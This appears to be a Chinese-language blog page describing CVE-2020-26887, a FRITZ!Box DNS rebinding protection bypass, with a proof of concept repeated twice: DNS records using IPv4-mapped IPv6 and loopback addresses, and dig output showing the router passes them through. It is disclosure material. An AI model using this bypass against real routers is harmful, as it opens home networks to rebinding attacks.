CVE-2020-26887_DNS_Rebinding_Protection繞過漏洞

# CVE-2020-26887 DNS Rebinding Protection繞過漏洞

==已修復版本==
>= 7.21

==POC==

Supposing the following resource records (RR) are configured for different
subdomains of example.com:

------------------------------------------------------------------------
private.example.com        1  IN  A     192.168.178.20
local.example.com          1  IN  A     127.0.0.1
privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20
------------------------------------------------------------------------

A DNS request to the FRITZ!Box router for the subdomain
private.example.com returns an empty answer, as expected:

------------------------------------------------------------------------
$ dig private.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com.	IN	A
------------------------------------------------------------------------

DNS requests for the subdomains privateipv6.example.com and
local.example.com return the configured resource records successfully,
effectively bypassing the DNS rebinding protection:

------------------------------------------------------------------------
$ dig privateipv6.example.com @192.168.178.1 AAAA
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com.	IN	AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1	IN	AAAA	::ffff:192.168.178.20


$ dig local.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.	IN	A

;; ANSWER SECTION:
local.example.com. 1	IN	A	127.0.0.1
------------------------------------------------------------------------


==已修復版本==
>= 7.21

==POC==

Supposing the following resource records (RR) are configured for different
subdomains of example.com:

------------------------------------------------------------------------
private.example.com        1  IN  A     192.168.178.20
local.example.com          1  IN  A     127.0.0.1
privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20
------------------------------------------------------------------------

A DNS request to the FRITZ!Box router for the subdomain
private.example.com returns an empty answer, as expected:

------------------------------------------------------------------------
$ dig private.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com.	IN	A
------------------------------------------------------------------------

DNS requests for the subdomains privateipv6.example.com and
local.example.com return the configured resource records successfully,
effectively bypassing the DNS rebinding protection:

------------------------------------------------------------------------
$ dig privateipv6.example.com @192.168.178.1 AAAA
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com.	IN	AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1	IN	AAAA	::ffff:192.168.178.20


$ dig local.example.com @192.168.178.1
; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.	IN	A

;; ANSWER SECTION:
local.example.com. 1	IN	A	127.0.0.1
------------------------------------------------------------------------
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容